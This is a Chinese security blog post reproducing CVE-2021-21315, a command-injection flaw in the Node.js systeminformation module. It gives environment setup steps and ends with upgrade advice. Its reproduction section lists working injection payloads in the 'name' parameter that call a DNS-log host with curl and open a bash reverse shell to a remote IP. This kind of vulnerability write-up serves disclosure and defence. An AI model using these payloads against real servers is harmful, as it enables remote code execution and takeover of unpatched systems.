官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
(CVE-2021-21315) Node.js systeminformation模块RCE
linluhaijing- 关注
(CVE-2021-21315) Node.js systeminformation模块RCE
1、 简介
Node.js-systeminformation是用于获取各种系统信息的Node.JS模块它包含多种轻量级功能,可以检索详细的硬件和系统相关信息自发布至今,systeminformation软件包下载次数近3400万。
2、 漏洞描述
该漏洞允许攻击者无回显的进行命令执行。
3、 影响范围
Systeminformation < 5.3.1
4、 漏洞环境
Nodejs下载安装:
wget https://nodejs.org/dist/v12.18.4/node-v12.18.4-linux-x64.tar.xz
tar -xvf node-v12.18.4-linux-x64.tar.xz
mv node-v12.18.4-linux-x64 nodejs
sudo mv nodejs/ /usr/local/sbin/
sudo ln -s /usr/local/sbin/nodejs/bin/node /usr/local/bin/
sudo ln -s /usr/local/sbin/nodejs/bin/npm /usr/local/bin/
下载源码:
git clone https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
开启环境:
Node index.js
5、 复现
Poc:
/api/getServices?name=$(curl http:// gh82p1.dnslog.cn) /api/getServices?name[]=$(curl http:// gh82p1.dnslog.cn) /api/getServices?name[]=$(bash -i >& /dev/tcp/192.168.2.197/8443 0>&1)
6、 漏洞防御
建议将 systeminformation 及时升级到 5.3.1 或更高版本
https://www.npmjs.com/package/systeminformation
本文为 linluhaijing 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
linluhaijing LV.4
林深时见鹿,海蓝时见鲸,梦醒时见你。
- 11 文章数
- 10 关注者
用魔法打败魔法,教你如何制作钓鱼软件反制红队
2021-05-18
(CVE-2021-27651)Pega Infinity任意重置密码漏洞复现
2021-05-17
CVE-2020-10204 Nexus Repository Manager 3 表达式解析漏洞 RCE复现
2021-05-13
文章目录